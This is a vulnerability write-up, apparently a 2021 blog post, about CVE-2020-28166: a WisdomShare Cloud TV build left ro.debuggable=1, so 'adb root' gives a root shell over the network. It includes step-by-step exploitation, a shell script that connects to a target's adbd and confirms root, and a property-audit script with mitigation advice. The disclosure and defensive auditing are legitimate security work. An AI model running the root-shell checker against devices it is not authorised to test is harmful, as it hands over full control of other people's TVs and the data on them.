Tale of CVE-2020-28166

Bugsbunnyy
7 min read · May 12, 2021

It is estimated that by the end of 2025 there will be 55.75 billion IoT devices, connecting smart appliances, smart grids, self-driving cars and much more. In a world full of these devices and smart innovations, can we really say that we are secure from cyber attacks?

Today most of us have smart devices at home, ranging from simple smart doorbells to smart ACs and TVs. Almost all smart TVs now run on the Android operating system, but many vendors ship an unpatched, vulnerable build of it, sometimes with debug privileges left enabled.

Some time back I started researching Android TVs that run modified versions of the Android operating system. Most of them are manufactured and assembled in China. Although they come with a plethora of features and functionality, they are still vulnerable to many common attacks. My smart TV runs WisdomShare Cloud TV, a modified Android build, and as nice as it is to have a smart cloud TV in your house, the possibilities for hacking it are endless.

In this post I will detail one such vulnerability I found in my smart TV, which can have a devastating effect if left unfixed.

What is CVE-2020-28166 about?

Smart TVs are computers just like your phone and laptop, and they are susceptible to the same kinds of attack. This section describes the vulnerability I found in my smart TV, which can have a devastating effect if left unfixed.

My smart TV runs a WisdomShare Cloud TV build of Android. As good as it may seem, it is open to attack. While playing around with the TV I found a way to exploit it: its Android Debug Bridge daemon would restart as root on request, so anyone who can reach it on the network gets a root shell, and with it my passwords, my private data and every other file on the device. I was able to use Android Debug Bridge (ADB) to gain root access to the smart TV.

What is Android Debug Bridge (ADB)?

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. The ADB command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device. It is a client-server program that includes three components:

Client

The client is the side that sends commands. It runs on your development machine (or on an attacker's laptop) and is invoked from a command-line terminal with the adb command.

ADB Daemon (ADBD)

The daemon (adbd) is the program on the device that actually runs the commands sent from the development machine. It runs as a background process on each device, and it is this process that decides, from the build properties, whether it runs as root or as the unprivileged shell user.

Server

A server manages communication between the client and the daemon. The server runs as a background process on your development machine.

The Exploit

Step 1

Using the adb devices command, the attached Android devices were listed, and my TV showed up among them.

Step 2

With my device listed, an attempt to run adb root was made, and it succeeded: adbd restarted as root.

Step 3

It was shocking to see how easy it was to run adb root: the device neither required USB debugging authorization (no RSA key prompt to accept on the TV) nor had any other protection in place.

Step 4

To reconfirm, the id command was run in the adb shell. It reported uid=0(root), which means the shell is root and every file on the device, including the user's sensitive data, is now readable and writable.
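The four steps above, written up as a small sh checker. This is an added example, not code from the original post or from the TV's firmware; it assumes adbd is reachable over TCP (the usual port is 5555), that the adb client is on PATH, and the address 192.0.2.10 in the usage line is a placeholder.

```shell
#!/bin/sh
# Added example, not code from the original post: reproduce steps 1-4 against
# one target and report whether its adbd can be restarted as root.
# Assumptions: adbd is reachable over TCP (the usual port is 5555), the `adb`
# client is on PATH, and 192.0.2.10 in the usage line is a placeholder.

ADB="${ADB:-adb}"

# check_adb_root HOST:PORT
#   returns 0 -> adb root accepted and `id` reports uid 0 (the TV's bug)
#   returns 1 -> adbd answered but the shell stayed unprivileged (user build)
#   returns 2 -> target not listed as "device" (offline or RSA auth pending)
check_adb_root() {
    target="$1"

    # Step 1: attach to the network adbd and confirm it is listed as "device",
    # not "unauthorized" (key prompt pending) or "offline".
    "$ADB" connect "$target" >/dev/null 2>&1 || true
    if ! "$ADB" devices | grep -q "^${target}[[:space:]]*device"; then
        echo "[-] $target: not attached (offline or waiting for RSA authorization)" >&2
        return 2
    fi

    # Step 2: ask adbd to restart as root. A production (user) build replies
    # "adbd cannot run as root in production builds" and nothing changes.
    root_out=$("$ADB" -s "$target" root 2>&1) || true
    case "$root_out" in
        *"cannot run as root"*)
            echo "[+] $target: adb root refused: $root_out"
            return 1 ;;
    esac

    # adbd drops the TCP session while it restarts; give it a moment and
    # reattach before talking to it again.
    sleep 1
    "$ADB" connect "$target" >/dev/null 2>&1 || true

    # Steps 3-4: "restarting adbd as root" is only a promise. Verify with `id`
    # and read the build flag that makes the restart possible.
    id_out=$("$ADB" -s "$target" shell id 2>/dev/null | tr -d '\r') || true
    dbg=$("$ADB" -s "$target" shell getprop ro.debuggable 2>/dev/null | tr -d '\r') || true
    case "$id_out" in
        "uid=0(root)"*)
            echo "[!] $target: ROOT SHELL (ro.debuggable=${dbg:-?}): $id_out"
            return 0 ;;
        *)
            echo "[+] $target: shell is unprivileged: ${id_out:-no response}"
            return 1 ;;
    esac
}

# Usage: sh check_adb_root.sh 192.0.2.10:5555
if [ "$#" -eq 1 ]; then
    check_adb_root "$1"
fi
```

The return code separates "adbd not reachable" from "reachable but refuses root" from "rootable", which is what you want when sweeping a LAN: only the last case is this bug, and an "unauthorized" listing means the TV at least asks for key authorization. Note that the check itself is the exploit: run it only against devices you own or are authorized to test.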

Why did this happen?

The vulnerability came from firmware released with a misconfiguration: the developers shipped a 'userdebug' build, which lets the adb daemon be restarted as root.

On further investigation we found that the 'ro.debuggable' property was set to '1'. adbd checks this flag: when it is 1 the device is treated as an engineering or debug build and the adb root command is honoured, restarting adbd with root privileges. On a production ('user') build the flag is 0 and adb root only answers that adbd cannot run as root in production builds.

Many Android TV devices do the same thing, shipping debug builds of vulnerable Android versions and putting consumers at risk.

How can this vulnerability be exploited?

An attacker who can reach the TV's adb daemon, over the LAN when adbd listens on TCP (commonly port 5555) or over USB, can use it to read, view and modify the whole system: it amounts to Remote Code Execution (RCE) as root.

  1. Any attacker on your network can read and exploit your sensitive data
  2. It can also lead to total device control

Successfully exploiting CVE-2020-28166 gives RCE as root, so an attacker can take over the device completely: steal, delete, add or overwrite content, plant malware, or use the TV as a doorway into other systems and servers on the same network.

How to Mitigate?

Many Android devices run on debug builds, possibly to give the average user a smoother plug-and-play experience. However, this puts users' sensitive data at significant risk from cybercriminals looking to exploit every such weakness.

For CVE-2020-28166, the vulnerability elaborated on in this article, the easy fix is to set the ro.debuggable flag to 0 in default.prop. Since that file is part of the read-only boot image, the fix reaches users only through a firmware update. The complete fix is to ship a production 'user' build, which sets ro.debuggable=0 and ro.secure=1, requires RSA key authorization for adb clients (ro.adb.secure=1) and does not start adbd on a TCP port.
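A quick way to tell the misconfigured build from the fixed one, for both the "Why did this happen?" and the mitigation passages above: audit the device's property dump for the handful of settings that decide whether adbd can become root. This is an added example, not code from the original post; the two sample dumps are constructed for illustration (the property names are the real Android ones), and the script reads either a default.prop/build.prop file or the output of adb shell getprop.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a property dump for
# the settings that let adbd be restarted as root. The input is either a
# default.prop / build.prop file ("key=value" lines) or the output of
# `adb shell getprop` ("[key]: [value]" lines). Both sample files below are
# constructed for illustration; the property names are the real Android ones.

# prop_get FILE KEY -> prints the value of KEY, or nothing if it is unset
prop_get() {
    file="$1"
    key=$(printf '%s' "$2" | sed 's/\./\\./g')   # escape dots for the regex
    tr -d '\r' < "$file" | sed -n \
        -e "s/^${key}=\(.*\)$/\1/p" \
        -e "s/^\[${key}\]: \[\(.*\)\]$/\1/p" | head -n 1
}

# audit_props FILE -> prints one line per finding; returns 0 when the dump
# looks like a locked-down user build, 1 when anything root-enabling is set.
audit_props() {
    file="$1"
    n=0

    v=$(prop_get "$file" ro.debuggable)
    if [ "$v" = 1 ]; then
        echo "ro.debuggable=1: adbd honours 'adb root' (expected 0)"; n=$((n+1))
    fi

    v=$(prop_get "$file" ro.secure)
    if [ "$v" = 0 ]; then
        echo "ro.secure=0: adbd starts as root without even being asked (expected 1)"; n=$((n+1))
    fi

    v=$(prop_get "$file" ro.adb.secure)
    if [ "$v" != 1 ]; then
        echo "ro.adb.secure=${v:-unset}: adb clients need no RSA key authorization (expected 1)"; n=$((n+1))
    fi

    v=$(prop_get "$file" ro.build.type)
    if [ "$v" != user ]; then
        echo "ro.build.type=${v:-unset}: not a production 'user' build"; n=$((n+1))
    fi

    for k in service.adb.tcp.port persist.adb.tcp.port; do
        v=$(prop_get "$file" "$k")
        if [ -n "$v" ] && [ "$v" != -1 ]; then
            echo "$k=$v: adbd listens on the network, reachable by anyone on the LAN"; n=$((n+1))
        fi
    done

    [ "$n" -eq 0 ]
}

# Constructed sample 1: the misconfiguration described in the post, as it
# would appear in default.prop on the affected TV.
SAMPLE_BAD=$(mktemp)
cat > "$SAMPLE_BAD" <<'EOF'
ro.secure=1
ro.allow.mock.location=0
ro.debuggable=1
ro.adb.secure=0
ro.build.type=userdebug
service.adb.tcp.port=5555
persist.sys.usb.config=adb
EOF

# Constructed sample 2: the fixed device (user build), in getprop format.
SAMPLE_GOOD=$(mktemp)
cat > "$SAMPLE_GOOD" <<'EOF'
[ro.secure]: [1]
[ro.debuggable]: [0]
[ro.adb.secure]: [1]
[ro.build.type]: [user]
[service.adb.tcp.port]: [-1]
EOF
trap 'rm -f "$SAMPLE_BAD" "$SAMPLE_GOOD"' EXIT

for f in "$SAMPLE_BAD" "$SAMPLE_GOOD"; do
    if audit_props "$f"; then echo "$f: OK"; else echo "$f: VULNERABLE"; fi
done
```

On a real device, feed it the output of adb shell getprop saved to a file, or default.prop pulled from the firmware image. Flipping ro.debuggable alone silences the first finding; the other checks are there so a vendor cannot call the build fixed while adbd still skips key authorization or listens on the network.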

Video link: https://youtu.be/ZqDI5MZEjzs